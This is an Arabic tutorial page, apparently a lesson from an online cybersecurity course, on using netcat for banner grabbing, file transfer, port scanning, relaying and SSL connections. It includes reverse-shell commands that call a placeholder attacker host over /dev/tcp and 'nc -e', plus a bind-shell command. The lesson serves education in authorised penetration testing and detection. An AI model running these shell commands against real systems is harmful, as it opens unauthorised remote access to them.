Netcat: سكين الجيش السويسري
استخدم nc للحصول على اللافتات، ونقل الملفات، وإعادة توجيه المنافذ، وإنشاء أصداف عكسية بسيطة.
Netcat: سكين الجيش السويسري درس مجاني في Cyber Security Academy على CoddyKit. هذا هو الدرس 3 من أصل 4. يمكنك قراءة الدرس كاملاً أدناه مجاناً — ثم تمرن عليه مباشرة في المتصفح باستخدام محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7. هذا الدرس جزء من مسار التعلم في Cyber Security Academy، وتقدمك يتزامن عبر الويب وتطبيق CoddyKit. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ما هو Netcat؟
Netcat (nc) أداة تقرأ البيانات وتكتبها عبر اتصالات الشبكة باستخدام TCP أو UDP. وهي مثبتة على كل أنظمة Unix تقريبًا، ولا غنى عنها لتصحيح الأخطاء ونقل الملفات والاستغلال الأساسي.
الاتصال الأساسي واستخراج Banner
اتصل بأي منفذ TCP لاستخراج Banner الخاص بالخدمة والتفاعل يدويًا مع البروتوكول. وهذا أبسط شكل من أشكال الاستطلاع.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPالاستماع على منفذ
يمكن لـNetcat الاستماع إلى الاتصالات الواردة باستخدام -l -p. ويفيد ذلك في اختبار الاتصال، والتقاط الصدفة العكسية، واستقبال الملفات.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberنقل الملفات باستخدام Netcat
يمكن لـNetcat إرسال الملفات عبر تمريرها إلى اتصال. ويستمع الطرف المستقبل ويعيد توجيه المخرجات إلى ملف. لا يوجد تشفير؛ لذا استخدموه على الشبكات الموثوقة فقط.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtفحص المنافذ باستخدام Netcat
يمكن لـNetcat تنفيذ فحص أساسي للمنافذ باستخدام -z (وضع الإدخال والإخراج الصفري) و-w (المهلة). وهو أبطأ من Nmap، لكنه مفيد عند عدم توفر Nmap.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443صدفة عكسية بسيطة
تجعل الصدفة العكسية الهدف يتصل مجددًا بالمهاجم. وهي مفيدة في اختبارات الاختراق عندما تمنع قواعد جدار الحماية الاتصالات الواردة إلى الهدف.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashالصدفة المرتبطة
تستمع الصدفة المرتبطة على الجهاز الهدف، ثم يتصل بها المهاجم. وهي أقل شيوعًا في اختبارات الاختراق الحديثة، لأن جدران الحماية تحظر عادةً الاتصالات الواردة.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555وضع UDP
استخدموا -u لاتصالات UDP. ويفيد ذلك في اختبار خدمات UDP مثل DNS (المنفذ 53) وSNMP (المنفذ 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161إنشاء وكيل باستخدام Netcat
يمكن لـNetcat تسلسل الاتصالات للانتقال عبر الشبكات. وبدمجه مع الأنابيب المسماة (mkfifo)، ينشئ أنفاقًا بسيطة ثنائية الاتجاه من دون أدوات إضافية.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: البديل الحديث
يوسّع Ncat (وهو جزء من Nmap) إمكانات Netcat بدعم SSL (--ssl) والتحكم في الوصول ووضع الوسيط. فضّلوا Ncat للقنوات المشفرة.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444للمدافعين: اكتشاف Netcat
تبدو اتصالات Netcat كاتصالات TCP عادية. ويكتشفها المدافعون من خلال مراقبة اسم العملية (HIDS)، والمنافذ الصادرة غير المعتادة، وبدء صدفة من عمليات أصل غير متوقعة.
اختبار سريع
ما خيار Netcat الذي يفعّل وضع الاستماع؟
الملخص: Netcat
Netcat أداة أساسية: استخدموها لاستخراج Banner، ونقل الملفات، واختبار الاتصال، وفهم آليات الصدف العكسية والمرتبطة. وفي اختبارات الاختراق المصرح بها، تتحقق من قواعد جدار الحماية وتحاكي انتقال المهاجم بين الشبكات. أتقنوها جيدًا، لاستخدامها واكتشافها على حد سواء.
تعلم Cyber Security Academy مع معلم ذكاء اصطناعي — مجانًا
اكتب وقم بتشغيل أكوادك الفعلية في المتصفح، واحصل على مساعدة فورية من معلم ذكاء اصطناعي متاح 24/7، واستمر من حيث توقفت على الويب أو في التطبيق.
- الدورات
- 76
- الدروس
- 303
الأسئلة الشائعة
هل درس «Netcat: سكين الجيش السويسري» مجاني؟
نعم — نص درس «Netcat: سكين الجيش السويسري» كامل متاح مجاناً هنا على الويب. لتمرينه بشكل تفاعلي (محرر أكواد مدمج ومدرس ذكاء اصطناعي متاح 24/7) وفتح باقي دورة Cyber Security Academy، انتقل إلى CoddyKit PRO. تتضمن دورة Cyber Security Academy 4 دروس في المجموع.
ماذا ستتعلم في «Netcat: سكين الجيش السويسري»؟
استخدم nc للحصول على اللافتات، ونقل الملفات، وإعادة توجيه المنافذ، وإنشاء أصداف عكسية بسيطة. تتمرن على Cyber Security Academy مع أكواد عملية تشغلها مباشرة في المتصفح، ومدرس ذكاء اصطناعي متاح 24/7 يجيب على أسئلتك أثناء عملك.
هل أحتاج إلى خبرة سابقة لأبدأ Cyber Security Academy؟
لا تُشترط خبرة سابقة. Cyber Security Academy على CoddyKit منظم للمبتدئين حتى المتقدمين، لذا يمكنك البدء من هنا أو من البداية والتقدم بسرعتك الخاصة. هذا هو الدرس 3 من أصل 4.
كم من الوقت يستغرق درس «Netcat: سكين الجيش السويسري»؟
معظم دروس CoddyKit تستغرق حوالي 5–10 دقائق. كل منها موجز وتفاعلي، لذا تحرز تقدماً مستمراً وتستأنف من حيث توقفت عبر الويب والتطبيق.
هل يمكنني كتابة وتشغيل أكواد في درس Cyber Security Academy هذا؟
نعم. كل درس في Cyber Security Academy يتضمن محرر أكواد مدمج، لذا تكتب وتشغل أكواداً حقيقية مباشرة في متصفحك وتحصل على تعليقات فورية من الذكاء الاصطناعي — بدون إعداد محلي.
جميع الدروس في هذه الدورة
- تقنيات فحص المنافذ باستخدام Nmap
- بصمة الخدمات وأنظمة التشغيل
- Netcat: سكين الجيش السويسري
- برمجة نصوص لتعداد الشبكات